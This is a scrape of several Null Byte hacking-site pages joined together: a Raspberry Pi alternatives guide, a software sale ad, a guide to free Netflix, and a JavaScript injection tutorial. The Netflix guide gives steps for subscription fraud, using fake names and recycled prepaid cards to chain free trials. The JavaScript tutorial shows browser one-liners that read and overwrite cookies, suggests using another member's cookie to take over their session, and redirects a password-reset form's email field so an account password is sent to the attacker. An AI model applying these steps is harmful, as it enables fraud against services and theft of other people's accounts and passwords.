Null Byte is looking formoderators!In today's Null Byte, we're hackingNetflix. As most of you know, Netflix is a subscription service that streams movies and TV shows to your devices over the internet. A common stance amongst my Xbox Live friends is that Netflix isn't worth the cost. The instant movies predominantly consist of old titles, and new movies aren't added often enough.However, I persisted that the service is indeed worth it, if only so we could watch Netflix movies communally through our avatars (a feature that has since been removed).My cheap friends stated, "If you get it for me, I'll watch stuff with you." So that is exactly what I did. Exploiting Netflix is rather easy. Let's check out how.RequirementsSpare email accountsSpare pre-paid debit cards (these can be depleted of funds)The ProcessThe process is simple. Netflix offers a free trial program for "new" users. We're going to exploit this weakness via prepaid debit cards. At the very least, if you lack spare prepaid debit cards, you can purchase them and get free Netflix for two months on each one, while the cards themselves cost only 3 dollars.Register for a free trial withNetflix.Use a fake name when registering to Netflix, to avoid potential banning if they catch on.When the month is up, create aPaypalaccount with the debit card that you used for Netflix already.Register for another free trial with your Paypal account.This grants you two free months for every card, and it is pretty easy to get a hold of a used up prepaid debit card every two months.Follow and Chat with Null Byte!TwitterGoogle+IRC chatWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicensePhoto byformatc1RelatedHow To:Get Unlimited Free Trial Subscriptions to Netflix, Spotify, and More Using GmailHow To:Watch Free Movies on YouTubeHow To:Play Netflix Roulette to Determine What You Watch Next on Your Galaxy S4News:Razer Phone Update Will Add Dolby Digital Plus 5.1 Surround Sound & HDR for NetflixHow To:Bypass Candy Crush Saga's Waiting Period to Get New Lives & Levels ImmediatelyHow To:Share a Netflix Video You're About to Watch to Your Instagram Story So Friends Can Watch with YouHow To:This Extension Fixes Everything Annoying About Binging NetflixNews:Netflix to Block VPN & Proxy Users from Streaming Content in Other TerritoriesNews:Netflix Wants to Give You the Best Job Everβ€”Binge WatchingHow To:10 Life Hacks That'll Make Your Life Easier & Stress-FreeHow To:Add Movie Trailers to Your iPhone's Netflix AppHow To:Skip Time Restrictions for Candy Crush Saga on Your iPhone for New Lives & Levels FasterHow To:8 Netflix Hacks You Should Know for Improved & Unrestricted Streaming on Any DeviceHow To:Netflix Games Coming to Android Tomorrow β€” But You Can Play Its Games Right NowHow To:The 5 Best Apps for Streaming Movies on Your PhoneGadget Hacks' Pandemic Prep:Apps, Info & Services to Keep You Safe & ProductiveBest TV Streaming Apps:Disney+ vs. Apple TV+ vs. Netflix vs. Hulu vs. Amazon PrimeHow To:Build a Netflix IR Sock (That Pauses Netflix When You Fall Asleep)News:Netflix & Verizon Could Be Headed Towards a Legal BattleHow To:Get IMDb Ratings in the Netflix App for AndroidHow To:A Smartphone User's Guide to Surviving ThanksgivingNews:Stop Netflix from Eating Your Data While StreamingHow To:The Ultimate Guide to Smoother Netflix Streams on Any Device, AnywhereHow To:Create Custom Netflix Watch Lists for Categories & Genres, Then Say Goodbye to Your Overcrowded 'My List'News:Google Joins Netflix in Shaming ISPs into Faster ServiceHow to VFX Tutorial:StarCraft II Real LifeSneak Peak:Xbox Live's Metro User Interface (Coming in November)How To:Revert to the Old Netflix App on the New Xbox 360 UpdateNews:Netflix and Redbox Info GraphicsNews:Wii + Netflix = Finally!News:Awesome Trick with Prepaid "GoPhones" Nabs You Free Text Messaging for LifeNews:Microsoft Story Video softwareSHOT ON 7D:2010 SXSW Grand Jury Prize WinnerNews:Free Build Challenge Extended! Plus, Learn About the 3D Printing Process…News:Major Announcement - ALL NEW TO MIKEYSSMAILNews:I Don't AlwaysHow To:9 Tips for Maximizing Your Laptop's Battery LifeNews:In the journey it all exists and goes on...News:The Life Line (Repaired Video From 2007)News:Extreme Close-up Photo Challenge: Life's Answer!
Snort Β« Null Byte :: WonderHowTo
No content found.
Raspberry Pi Alternatives: 10 Single-Board Computers Worthy of Hacking Projects Big & Small Β« Null Byte :: WonderHowTo
The$35 Raspberry Piis an amazingly useful single-board computer (SBC) with a good balance of price, performance, and connectivity options. But for some projects, it just isn't enough. Whether you need more computing power, a smaller size, or better machine-learning capabilities, there are other options available.For those unfamiliar, an SBC means that all of the components of the computer are on a single printed circuit board (PCB), including the CPU, GPU, and memory. In a regular computer, as you know it, those parts are generally interchangeable and replaceable to some degree, but the benefits of having them all integrated on a single PCB is that you get a much smaller form factor.StandardRaspberry Pimodels are computers shrunk down to the size of the height and width of a credit card, and if you add the depth in there, about the size of anall-in-one external card reader. The Pi Zero models are even smaller.Don't Miss:10 Essential Gadgets Every Hacker Should TryWhile SBCs have been around since the '70s, it wasn't until the 2012 launch of the Raspberry Pi 1 Model B that they became so popular. With that popularity came a boatload of imitators. Some are near copycats but that attempt to provide added value in various ways such as having a more powerful processor, more memory, or being cheaper than the already low-priced Pis. Depending on the type of project you're looking to run, a non-Pi board may be more beneficial to you.Raspberry Pi Competitors: ConsiderationsWhen you're selecting a Raspberry Pi alternative, you should carefully consider what your needs are. For example, are you looking for a general purpose SBC to use on various projects, or do you want something for a specific project where it needs to do its job for extended periods? You should also consider your budget. Can you afford to throw money at the problem, or would it be better to have two or three cheaper alternatives compared to one extremely powerful one?Also, size can be a critical consideration if you're doing a project involving tight spaces or hiding from notice. For example, in ourspy camera project, you'd want the tiniest SBC that you can get away with. Connectivity is also commonly forgotten about until you start working on your project and realize the Ethernet is super slow or that you don't have Wi-Fi.Don't Miss:Null Byte's Collection of Raspberry Pi TutorialsLastly, ask yourself just how much hand-holding you need on your projects. Do you follow guides or blaze your own trail, because some Pi alternatives don't have the community support or even documentation to be considered noob-friendly.We'll go over some alternative SBCs that will work in all of the above scenarios, but before we do so, let's refresh our memory on the Raspberry Pi 3 Model B+, the most popular Raspberry Pi model. There is a new Raspberry Pi 4 Model B out, which we have listed as a newer alternative to the 3 B+ below, but it's had someissues with USB-C power, so it's not yet the must-have Pi to compare other boards to.Raspberry Pi 3 Model B+While the Raspberry Pi 3 Model B+ is not the latest iteration of the full-size Raspberry Pi, it's more dependable until the Raspberry Pi 4 sorts its issues out.The 3 B+ takes a classic Pi and gives it some long-needed upgrades such as 5 GHz Wi-Fi and an Ethernet chip capable of speeds faster than 100 megabits per second with PoE (power over Ethernet) capabilities. While it has the same CPU as the previous model, it also adds a heat spreader to the CPU for better heat management which allowed overclocking the processor to 1.4 GHz, gaming roughly a 17% improvement over the previous Pi β€” all of this while maintaining the gold standard $35 price tag.Image via Raspberry PiFor specs and more detail information on the Raspberry Pi 3 Model B+, as well as how to build a hacking kit with it, check outour article and videoon the subject.More Info:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+Processor: Broadcom BCM2837B0, Cortex-A53 64-bit SoC @ 1.4 GHzGPU: Broadcom VideoCore IVMemory: 1 GB LPDDR2 SDRAMStorage: microSD cardWi-Fi: 2.4 GHz and 5 GHz IEEE 802.11.b/g/n/acEthernet: gigabit Ethernet over USB 2.0 (maximum throughput 300 Mbps)Bluetooth: 4.2, BLEPorts: full-size HDMI; four USB 2.0; four-pole stereo jack; composite videoGPIO: extended 40-pin headerConnections:CSI camera; DSI displayPower: 5 V/ 2.5 A DC power input via Micro-USB port; PoE supportDimensions: 3.37 in (H) x 2.22 in (W) x 0.67 in (D)Price: $35 (Adafruit|Amazon)Suggested on Amazon:CanaKit Raspberry Pi 3 B+ (B Plus) with 2.5A Power Supply (UL Listed)Option 1: ASUS Tinker Board STheTinker Board Scomes from a name brand that many computers enthusiasts will recognize, Asus. And as you would expect from that name brand, its features are top notch.The easiest way to think of the Tinker Board S is as an expensive Pi on steroids. The form factor of the Tinker Board S is a pure clone of the standard Pi right down to the port layout and 40-pin connector. Asus even managed to improve the connector by color coding and labeling it, which is extremely helpful if you're using GPIO pins a lot.Additionally, it has a much beefier processor and GPU, which should help with those compute-intensive tasks or anything that requires rendering complex scenes. If your project is going to be using networking, the Tinker Board S also features full gigabit Ethernet, making it ideal for access point projects like thePumpkin Pi.Don't Miss:How to Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketImage via AsusThe real highlight, however, is the 16 GB of eMMC, which is flash storage and should equate to faster processing when compared to the microSD typical to the Pi.With all these beefy features comes a hefty price tag of about $92. If the price isn't a concern for you, or if you need the extra processing power, then the Tinker Board S should be a top choice. But if you're on a budget, you could get two Raspberry Pi 3 B+ boards for the same price.Image viaAsusProcessor: Rockchip Quad-Core RK3288GPU: ARM Mali-T764Memory: 2 GB dual channel DDR3Storage: microSD card; built-in 16 GB eMMCWi-Fi: 2.4 GHz IEEE 802.11 b/g/nEthernet: gigabit EthernetBluetooth: 4.0 EDRPorts: full-size HDMI; four USB 2.0; stereo jack; mic inputGPIO: 40-pin headerConnections:CSI camera; DSI displayPower: 5 V / 2–3 A DC power input via Micro-USB portDimensions: 3.37 in (H) x 2.125 in (W)Price: $91.99 (Amazon|B&H)Suggested on Amazon:Zebra Black Ice Case for Asus Tinker Board S by C4LabsOption 2: Banana Pi M64TheBanana Pi M64is an improved 64-bit version of the Banana Pi capable of using Android, Ubuntu, Debian, OpenBSD, and Windows 10 IoT core among other OSes. It has double the RAM of the Pi 3 B+, built-in eMMC memory for snappier processing, and full gigabit Ethernet. Do you see a pattern yet? The Raspberry Pi Foundation is lagging on their Ethernet game!However, the Banana Pi M64 only offers two USB ports opposed to the four on a standard Pi. And it's not quite the standard Pi form factor but does manage to maintain the 40-pin GPIO connector that we're all familiar with.Image via Banana PiAn interesting quirk of the Banana Pi M64 is that it has an infrared receiver, which means it could be beneficial for specific IR-controlled IoT projects. All in all, the M64 is a pretty good deal if you don't need complete documentation and community support. If you're willing to deal with everything that goes along with buying Chinese products from AliExpress, then this is a bargain.Image via Banana PiProcessor: Allwinner A64 (4x Cortex-A53 @ 1.2 GHz)GPU: Mali-400 MP2Memory: 2 GB DDR3 SDRAMStorage: 8 GB to 64 GB eMMC; microSD card (up to 64 GB)Wi-Fi: 2.4GHz IEEE 802.11 b/g/nEthernet: gigabit EthernetBluetooth: 4.0Ports: full-size HDMI; two USB 2.0; Micro-USB OTG; stereo jackGPIO: 40-pin headerConnections:CSI camera; DSI displayPower: 5 V / 2 A DC power input via 4.0 mm barrel jackDimensions: 3.62 in (H) x 2.36 in (W)Price: $52–$80 (Ali Express|Amazon)Option 3: Atomic PiTheAtomic Piis a brand new player on the scene. It's an x86-based SBC only costing $35. With its specs, it would have been considered a great tablet four years ago, and it's more in line with a low-end NUC-style computer.However, to use the full features of the Atomic Pi, it requires a $15 breakout board to supply power, so this definitely shouldn't be a top choice if your project requires a small size. That said, it has the computer power, so if you're planning a project that's going to sit on the desk or in a network closet, and you're comfortable with booting a bare Linux system, it's worth considering.Image via Digital Loggers DirectProcessor: Intel Atom x5-Z8350 (up to 1.92 GHz)GPU: Intel HD Graphics (Cherry Trail)Memory: 2 GB of DDR3L-16000Storage: 16 GB eMMC; microSD card (up to 256 GB)Wi-Fi: 2.4 GHz and 5 GHz IEEE b/g/n/acEthernet: gigabit hard-wired RJ45 Ethernet RTL8111GBluetooth: 4.0Ports: full-size HDMI; USB 3.0; four USB 2.0GPIO: 26-pin headerConnections:n/aPower: 5 V / 2.5–4 A DC power inputDimensions: 5.12 in (H) x 3.94 in (W) x 1.97 in (D)Price: $44–$49 (Amazon|Digital Loggers Direct)Suggested on Amazon:DLI Atomic Pi Full Developers KitOption 4: Rock64TheRock 64is a reliable Pi alternative. It's Rockchip CPU slightly edges out the Broadcom processor on the Pi 3 B+, and it offers one more gigabyte of RAM for the same price. Other versions can increase that to 4 GB RAM total for about $45. Additionally, it provides an eMMC socket if you chose to use it over a microSD card. Typically, they are more expensive than a microSD card of the same capacity.Image via Pine64One of the key differences between the Rock64 and Pi 3 B+ is that the Rock64 only has three USB ports, but that third port is USB 3.0 which offers faster speeds and could be expanded with a USB hub easily. The Rock64 is also capable of handling 4K video at 60 fps which could make it great for retro Pi projects or anything else involving high-resolution video.Image via Pine64Processor: Quad-core Cortex-A53 (up to 1.5 GHz)GPU: ARM Mali-450MP2 Dual-coreMemory: LPDDR3 RAM memory variants: 1 GB, 2 GB, 4 GBStorage: eMMC card; microSD cardWi-Fi: with moduleEthernet: gigabit EthernetBluetooth: with modulePorts: full-size HDMI; USB 3.0; two USB 2.0; composite videoGPIO: 40-pin headerConnections:n/aPower: 5 V / 3 A DC power input via 3.5 mm barrel jack; PoE supportDimensions: 3.35 in (H) x 2.2 in (W)Price: $24.95–$44.95 (Amazon(1 GB) |Amazon(2 GB) |Amazon(4 GB) |Pine64)Suggested on Amazon:Zebra Black Ice for the Rock64 Media Board by C4LabsOption 5: NVIDIA Jetson Nano Developer KitMachine learning? Computer vision? Deep learning? AI? If any of those are involved in your project, then what you need is theNvidia Jetson Nano, end of story.Image via NVIDIAThe Jetson Nano is specifically designed to enable artificial intelligence at the edge. The module itself is the size of a standard laptop RAM card (SODIMM), which is intended to make it easy to implement into full-scale production runs. The developer kit breaks out that SODIMM module so we can tinker around with it.It has more than enough power to handle any AI ask you could throw at it, such as self-navigating robots and smart speakers. Do note, though, if you want wireless connectivity, you will have to use an M.2 key cellular or Wi-Fi card, which are commonly available and used in laptops.Processor: Quad-core ARM A57 @ 1.43 GHzGPU: 128-core MaxwellMemory: 4 GB 64-bit LPDDR4Storage: microSDWi-Fi: M.2 Key EEthernet: gigabit EthernetBluetooth: with modulePorts: full-size HDMI; four USB 3.0; Micro-USBGPIO: yesConnections:CSI camera; DisplayPortPower: 5 V / 4 A DC power input via barrel jack; 5 V / 2 A DC power input via Micro-USB port; PoE supportDimensions: 3.94 in (H) x 3.15 in (W) x 1.14 in (D)Price: $99 (Amazon|Nvidia|Sparkfun)Suggested on Amazon:NVIDIA Jetson Nano Starter Kit with 16 GB microSD Card, 5 V 4 A DC Power Supply, Edimax USB Wi-Fi for DeepLearning AI DevelopmentOption 6: Onion Omega2+If you're looking for an alternative to something like theRaspberry Pi Zero W, then theOmega2+is undoubtedly an option. It's positively microscopic, not much larger than a quarter, which makes it great for embedded applications and IOT projects in general. It runs Linux Embedded Development Environment, which is based on OpenWRT and intended for just such IOT projects.Additionally, the Omega2+ features a U.FL connector which gives it the capability of using external Wi-Fi antennas which can dramatically increase connection range. That alone makes it better than the Zero W, which can suffer from weak signal strength in some applications.Image via Onion CorporationProcessor: 580 MHz MIPS CPUGPU: n/aMemory: 128 MB DDR2 RAMStorage: microSD card; 32 MB flash storageWi-Fi: 2.4 GHz IEEE 802.11 b/g/nEthernet: with moduleBluetooth: with modulePorts: has support for USB 2.0GPIO: 18-pin headerConnections:n/aPower: 3.3 V DC operating voltageDimensions: 1.69 in (H) x 1.04 in (W)Price: $13–$15 (Amazon|Onion)Option 7: NodeMCUThe Raspberry Pi can be overkill for a lot of simple projects where not a lot of processing power is called for, such as running a sensor and sending data back to a hub. That's where microcontrollers like the NodeMCU come in handy, which works great for aWi-Fi deauth alarm,beacon spammer, anddevice detector.Image via NodeMCUThe NodeMCU is based on the famousESP8266Wi-Fi microchip, which was never intended to be used as anything but a Wi-Fi module. But people started to realize that you could use the downtime between Wi-Fi transmissions to do useful things β€” and the NodeMCU was born.If you don't mind having RAM and storage best measured in kilobytes, then the NodeMCU is excellent and, most importantly, dirt cheap. It's virtually disposable when compared to more expensive alternatives such as the Asus Tinker Board S. And there are many different manufacturers of the NodeMCU, so quality may vary from board to board. We recommend the one with the CP2102 instead of the CH340.Unfortunately, a limitation of working with a NodeMCU is that you have to program or find programs in C++/Arduino since you're not running a full or even cut-down version of Linux like the rest of the Pi alternatives in our list. Check out ourguide to programming microcontrollersfor a more detailed comparison to a Raspberry Pi.More Info:A Hacker's Guide to Programming MicrocontrollersProcessor: L106 32-bit RISC 80 MHz CPUGPU: n/aMemory: 128 kBStorage: built-in 4 MB flashWi-Fi: 2.4 GHz IEEE 802.11 b/g/nEthernet: n/aBluetooth: with modulePorts: Micro-USBGPIO: 15-pin headerConnections:n/aPower: 5 V DC power input via Micro-USB portDimensions: 1.93 in (H) x 0.96 in (W) x 0.51 in (D)Price: $5–$20 (Ali Express|Amazon)Suggested on Amazon:Set of 4 NodeMCU ESP8266 CP2102 Development BoardsOption 8: ODroid XU4TheODroid XU4is a very powerful SBC that outclasses the Pi 3 B+ and even the Asus Tinker Board S. However, what it gains it compute power it throws out in conforming to standards. It doesn't use the 40-pin header that has become ubiquitous with the Pi, nor does it use the standard form factor or port layout. One neat feature that isn't common is a real-time clock (RTC), which will allow it to keep time across resets.Image via ODroidAll of this combined makes it an excellent board for compute-based projects, but I wouldn't recommend it as much for projects where you're fooling around with accessories and add-on boards unless you really know what you're doing. Also, consider that for the price of one XU4 you could buy two Pi 3 B+ boards and two Pi Zero W boards.Image via ODroidProcessor: Samsung Exynos5422 Cortex-A15 2 GHz and Cortex-A7 Octa-core CPUsGPU: Mali-T628 MP6Memory: 2 GB LPDDR3 RAM PoP stackedStorage: eMMC; microSD cardWi-Fi: with USB adapterEthernet: gigabit EthernetBluetooth: with USB adapterPorts: full-sizde HDMI; two USB 3.0; USB 2.0GPIO: 30-pin headerConnections:serialPower: 5 V / 4 A DC power inputDimensions: 3.27 in (H) x 2.28 in (W) x 0.87 in (D)Price: $50–$80 (Amazon|ameriDroid|Hardkernel)Option 9: NanoPi NEO4TheNanoPi NEO4is essentially a shrunken Pi 3 B+ at about half the size. It's processing capabilities are very similar to the Pi 3 B+ but just a little better with its six-core processor.Image via FriendlyarmThe real selling point here is the smaller form factor for when you still need something smaller with the processing power of a standard size Pi. It also offers excellent connectivity with a USB 3.0 port and USB-C port.Image by NanoPi/AntratekProcessor: Dual-Core Cortex-A72 (up to 2.0 GHz) + Quad-Core Cortex-A53 (up to 1.5 GHz)GPU: Mali-T864 GPUMemory: 1 GB DDR3-1866Storage: eMMC socket; microSD card up to 128 GBWi-Fi: 2.4 GHz IEEE 802.11 b/g/nEthernet: gigabit EthernetBluetooth: 4.0Ports: full-size HDMI; USB 3.0; USB 2.0; USB Type-CGPIO: 40-pin headerConnections:CSI cameraPower: 5 V / 3 A DC power input via USB Type-C portDimensions: 2.36 in (H) x 1.77 in (W)Price: $50 (Amazon|Friendlyarm)Option 10: Raspberry Pi 4 Model BLast but certainly not least, we have a very recent addition to the Raspberry Pi family, thePi 4 Model B. The Pi 4 is an upgrade in every way over the 3 B+. It has gigabit internet with PoE capability, dual-band Wi-Fi, USB 3.0 ports, and a flexible amount of RAM. On top of that, it maintains the same form factor as the 3 B+ meaning that all your Pi hats will work on the new model 4.Image via Raspberry PiThe USB-C power connector is a very welcome upgrade. However, do keep it in mind when buying that it makes all your old Micro-USB power supplies useless. Additionally, the USB-C and mini HDMI connectors mean that many older Pi cases will not work with the newer version. It does currently havesome issues with USB-C power, where the port uses on resistor when it should use two. So some cables won't charge the board, meaning you'll need a cable that's not "e-marked."If it's such an upgrade over the older 3 B+, then why am I listing the Pi 4 only as an alternative? Well, there is one primary reason: supply. As it is often the problem when a successful product launches, it can be challenging to get your hands on one. For these first few months, you will likely see restrictions of one per customer or one per address when purchasing, if you can find them in stock at all. This limits its usefulness for the time being if you're trying to do a project now. Plus, it's better off waiting until it fixes the USB-C issue in a future board revision.Image via Raspberry PiProcessor: Quad-core Cortex-A72 (ARM v8) 64-bit SoC @ 1.5 GHzGPU: OpenGL ES 3.0 graphicsMemory: 1 GB, 2 GB, or 4 GB LPDDR4-2400 SDRAMStorage: microSD cardWi-Fi: 2.4 GHz and 5.0 GHz IEEE 802.11acEthernet: gigabit EthernetBluetooth: 5.0 BLEPorts: two Micro-HDMI; USB Type-C; two USB 2.0; two USB 3.0; four-pole stereo jack; composite videoGPIO: 40-pin headerConnections:CSI camera; DSI displayPower: 5 V / 3 A DC power input via GPIO header; 5 V/ 3 A DC via USB Type-C port; PoE supportDimensions: 3.37 in (H) x 2.22 in (W) x 0.67 in (D)Price: $35, $45, or $55 (Adafruit|Amazon|CanaKit)Suggested on Amazon:CanaKit Raspberry Pi 4 Basic Kit (2 GB)Wrapping UpAll in all, there are a lot of options for Pi alternatives, depending on what niche your project fits into. If you're relatively new to SBCs and want to stick to well-worn paths but want something with a little more oomph than the standard Pi 3 B+, then try to get your hands on the newer Raspberry Pi 4. But if it's sold out and you need a lot of them, then I would look into the Asus Tinker Board S.If you're into flying drones, making robots, or anything that involves computer vision or speech recognition, then the Nvidia Jetson Nano is the way to go. If you want something tiny that could be easily hidden, look into the Onion Omega2+. To do something simple like reading a sensor or triggering a relay, give the NodeMCU a shot. Otherwise, if you have the money and you enjoy single-board computers, all of the ones listed above are worth a purchase to see which one is most useful to you.Thanks for reading! If you have any questions, you can ask below or on Twitter@The_Hoid.Don't Miss:Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byGareth Halfacree/FlickrRelatedHow To:Build a Portable Pen-Testing Pi BoxHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Set Up Network Implants with a Cheap SBC (Single-Board Computer)How To:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableHow To:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxNews:Smart Home Proof of Concept Uses a Raspberry Pi to Control Air Conditioner with HoloLensHow To:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+How To:Boot Multiple Operating Systems on the Raspberry Pi with BerryBootRaspberry Pi:Hacking PlatformThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationNews:These Guys Hacked Together a Raspberry Pi & Car Steering Wheel to Play Mario KartHow To:Set Up Kali Linux on the New $10 Raspberry Pi Zero WRaspberry Pi:Physical Backdoor Part 1How To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterOpen Sesame:Make Siri Open Your Garage Door via Raspberry PiHow To:Lock Down Your DNS with a Pi-Hole to Avoid Trackers, Phishing Sites & MoreHow To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Use VNC to Remotely Access Your Raspberry Pi from Other DevicesScrabble Challenge #5:Put Your 2-Letter Word Skills to the TestHow To:Create a Wireless Spy Camera Using a Raspberry PiHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHow To:Build an Off-Grid Wi-Fi Voice Communication System with Android & Raspberry PiHow To:Modify the USB Rubber Ducky with Custom FirmwareRasberry Pi:IntroductionHow To:Design Your Own Custom Arduino Board MicrocontrollerPost Pi Day Coding Project:Let's Uncover the Hidden Words in Pi
This HD Infographic Design Software Is on Sale for $45 Β« Null Byte :: WonderHowTo
Anyone who's worked in web development or graphic design long enough knows that one of the most difficult job elements is finding high-quality stock images that aren't tangled in red tape. Whether you're trying to build a website, ad campaign, or email newsletter, you need to have reliable graphics that are easy to find and use across multiple platforms.ThisEdraw Infographic Softwarepackage offers an award-winning trove of high-quality design elements that you'll be able to use to create a virtually limitless number of images and infographics from scratch, and right now, a perpetual license is available for over 50% off at just $45.With Edraw Infographic Software, you'll be able to quickly find and use a seemingly endless number of highly customizable images that can be put to work both online and in print. It's easy to track down exactly what you're looking for thanks to powerful and intuitive search functions. The images you end up using can be applied to infographics, flyers, posters, brochures, banners, cards, presentations, newsletters, eBooks, and other visual projects.Simply select a template, use library symbols that match your creative vision, add text, customize details, and export your completed project in minutes.This perpetual license grants you unlimited access to all of the images, so you'll never have to worry about hidden fees or red tape down the line, and you'll automatically be able to take advantage of every update the moment it's released.Spruce up your design projects and save yourself countless hours in the process by signing up for a perpetual license to Edraw Infographic Software forjust $45β€” over 50% off its usual price for a limited time.Prices are subject to change.See the Sale:Edraw Infographic Software for $45Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedNews:Microsoft Expands Its Augmented Reality App Portfolio from HoloLens to Android & iOSNews:Apple Blames Slow Sales on iPhone 8 RumorsHow To:Manage Your Business's Finances Like a Pro with This Easy-to-Use SoftwareHow To:Streamline Your App & Game Development with AppGameKitHow To:All the Best Black Friday Electronics & Gadget Deals of 2013How To:30+ Keyboard Shortcuts You Should Be Using on YouTubeMarket Reality:Vuzix Reports Sales Growth & Partners with BlackberryHow To:Here's Everything You Need for Your Next Design Project at a Steal of a PriceNews:Farmville infographic on Mashable.comWorld Cup Tech:Fine-Tuning the Beautiful GameNews:Massive Xbox Live Sale in E3 Week!News:Anatomy of a Computer VirusNews:The History of Science Fiction Info GraphicNews:Infographics built of LEGOGreat Deal:$0.99 EA & Gameloft iOS Games for ChristmasNews:Flying with SurfboardsNews:Network Admin? You Might Become a Criminal SoonHow To:Build a Star Wars Lightsaber (Infographic)News:Top 10 Christmas Gift Ideas for the SCRABBLE EnthusiastNews:May 2010 NPD Sales ResultsLiveOps:High Paying Home Call OperatorInfographic:The Simplest Explanation of How VR, AR & MR Technologies DifferNews:Sales Stats Show that Gamers Prefer Downloads Over DiscsThe Social Network Wars:Google+ vs FacebookNews:Android Reaches 10 Billion Downloads; Celebrate with Minecraft for $0.10!News:Kindle Scrabble app sale!News:Bocas Del Toro House and Land For SaleNews:The SCRABBLE KeyboardGreat Deal:RIM Slashes Prices on BlackBerry PlayBook Tablets to $299News:Supreme Court Deems Violent Video Games Protected Under Freedom of SpeechNews:Save up to 50% at Disney Store’s Twice Upon a Year SaleNews:Are Sale Signs Fair?News:April NPD Video Game SalesInfographic:Nvidia & Startups Are Big Winners in 2015–2017 Driverless Talent ShiftHow To:Missing an Ingredient? Consult This Guide to Cooking & Baking SubstitutionsNews:Cocktail BlueprintsNews:MAME Arcade cabinet+News:Sale Signs Drive Me Crazy & Reminds Me Of Robbery!News:DIY Wedding Invitation SoftwareNews:Learn Tagalog Today Episode 12, Shopping !
How to Use JavaScript Injections to Locally Manipulate the Websites You Visit Β« Null Byte :: WonderHowTo
JavaScript is one of the main programming languages that the Web is built on. It talks directly to your browser and exchanges information with it in ways that HTML simply cannot. With JavaScript, you are able to access browser cookies, website preferences, real-time actions, slideshows, popup dialogs and calculators, or you create entire web-based apps. The list goes on nearly forever.We can use JavaScript ourselvesβ€”right nowβ€”in the web browser. Go ahead, type this into the address bar of your browser without a URL in it and press the enter key:javascript:alert('Hello World!');You will see a popup box that says "Hello World!". This is what's called a JavaScript injection. We took a bit of JavaScript and manipulated the Web in real-time. JavaScript injections can be used to do a number of things; You can check cookie contents, swap cookies, temporarily edit a webpage, modify web forms, and even do some malicious stuff.In thisNull ByteI'm going to be teaching you the bare bones of JavaScript injections and how to manipulate cookies and web form data.Step1Alert & Injection ChainsLet's start by using the example we used above and create a JavaScript alert.javascript:alert('Hello World!');Let's dissect that. "javascript" tells the browser we are using JavaScript, "alert" is calling the alert function and everything between "()" is the argument. In the argument, you see single quotes that indicate text strings. They can be interchanged with double quotes, just like in english, but they must be consistent. These rules are almost uniform when it comes to programming.Let's chain commands. The semicolon is the indicator of command chains. Try this one out:javascript:alert('Hello World!'); alert("Double quotes, and second alert");Because JavaScript was already specified, we only need to call the alert function again.Step2Cookie Alerts & Cookie ModificationNow we are going to check if the webpage we are on uses cookies. Then we will see if we can edit the cookies to swap login sessions.javascript:alert(document.cookie)If you see a popup with lots of jumbles of letters and things like "PHPSESSID=", that means the website is storing cookies on your computer.Let's edit something in this cookie.javascript:void(document.cookie="__mvtVariantID=tacos");In the picture above, you see that I had the "__mvtVariantID="element. I use the JavaScript injection to modify it to the word "tacos". You'll see the new element at the bottom in the picture below. This also uses the "void" function, which voids an element with whatever information you want to put over it.Now if I were logged in and had another member's cookie, I could swap our sessions using these techniques, effectively becoming that member.Step3Edit Web FormsSometimes you may want to edit a web form. A web form is when you have to "submit" something to a server, usually in logins or forgotten password forms. Let's say we have a forgot password form for some website, and this is the HTML code they used:<form action="http://www.website.com/forgotpassword.php" method="post"> <input type="hidden" name="to" value="[email protected]">When using JavaScript to modify web forms, it labels them in numbers with the first web form being [0] and so on. For the example, this form will be [0]. Let's hack this form so it submits the user's password to us.javascript:void(document.forms[0].to.value="[email protected]")This is basically saying "Void the documents first form, skip (to) and go to the value (value) and make it equal to my email".That's it, those are the basics of JavaScript injections! If you learn JavaScript from the ground up, which I hope you do, you can do some pretty awesome hacks with it. Take care, and come visit me and friends inIRC!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicensePhoto byhitthatswitchRelatedHow To:Write an XSS Cookie Stealer in JavaScript to Steal PasswordsHow To:Inject Coinhive Miners into Public Wi-Fi HotspotsHow To:Use Javascript to make websites more interactiveHow 